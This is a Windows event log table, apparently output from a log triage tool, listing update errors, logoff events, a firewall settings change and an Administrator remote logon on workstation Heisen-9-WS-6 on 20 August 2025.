&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:05:16 &#9474; &#8227; Windows Update Error              &#9474; 1     &#9474; Microsoft-Windows-WindowsUpdat &#9474; 20       &#9474; 956       &#9474; Heisen-9-WS-6   &#9474; updateRevisionNumber: 200        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; eClient                        &#9474;          &#9474;           &#9474;                 &#9474; errorCode: '0x8024001e'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; updateTitle: Security Intellig   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ence Update for Microsoft Defe   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; nder Antivirus - KB2267602 (Ve   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; rsion 1.435.284.0) - Current C   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; hannel (Broad)                   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; updateGuid: E32236C4-D193-433F   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -9CAB-15CEB791E735               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; serviceGuid: 9482F4B4-E343-43B   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6-B170-9A65BC822C77              &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:05:18 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 3103      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: DWM-2            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-90-0-2      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Window Manag   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; er                               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x1ecda9'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:05:18 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 3104      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: DWM-2            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-90-0-2      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Window Manag   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; er                               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x1eca58'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:05:18 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 3105      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x1e3c97'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:05:18 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 3106      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: DWM-1            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-90-0-1      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Window Manag   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; er                               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0xf383'          &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:05:18 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 3107      &#9474; Heisen-9-WS-6   &#9474; TargetUserName: DWM-1            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 2                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-90-0-1      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: Window Manag   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; er                               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0xf330'          &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:05:22 &#9474; &#8227; Windows Update Error              &#9474; 1     &#9474; Microsoft-Windows-WindowsUpdat &#9474; 20       &#9474; 957       &#9474; Heisen-9-WS-6   &#9474; updateRevisionNumber: 1          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; eClient                        &#9474;          &#9474;           &#9474;                 &#9474; errorCode: '0x8024001e'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; updateTitle: 9NFFX4SZZ23L-Micr   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; osoft.549981C3F5F10              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; updateGuid: BD9AB7F6-D463-4C47   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -B356-5D2BD6A54FFC               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; serviceGuid: 855E8A7C-ECB4-4CA   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 3-B045-1DFA50104289              &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:11:39 &#9474; &#8227; Windows Firewall Settings         &#9474; 1     &#9474; Microsoft-Windows-Windows Fire &#9474; 2002     &#9474; 1507      &#9474; Heisen-9-WS-6   &#9474; ModifyingUser: S-1-5-80-308807   &#9474;
&#9474;                     &#9474; Have Been Changed                   &#9474;       &#9474; wall With Advanced Security    &#9474;          &#9474;           &#9474;                 &#9474; 3201-1464728630-1879813800-110   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 7566885-823218052                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValue: '06000000'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingType: 2                   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValueSize: 4              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SettingValueDisplay: Private,P   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ublic                            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; Origin: 1                        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ModifyingApplication: ''         &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-08-20 17:11:49 &#9474; &#8227; Admin User Remote Logon           &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4624     &#9474; 3321      &#9474; Heisen-9-WS-6   &#9474; AuthenticationPackageName: Neg   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; otiate                           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonProcessName: User32         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetOutboundDomainName: '-'    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLinkedLogonId: '0x0'       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LmPackageName: '-'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: HEISEN-9-WS-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 6                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: HEISEN-9-WS-6   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; $                                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; IpAddress: 10.10.16.6            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; KeyLength: 0                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x3e7'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x4804c'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ElevatedToken: '%%1842'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonGuid: 00000000-0000-0000-   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 0000-000000000000                &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; RestrictedAdminMode: '%%1843'    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: WORKGROUP     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 10                    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; VirtualAccount: '%%1843'         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetOutboundUserName: '-'      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; WorkstationName: HEISEN-9-WS-6   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; IpPort: '0'                      &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; ImpersonationLevel: '%%1833'     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-5-18         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TransmittedServices: '-'         &#9474;
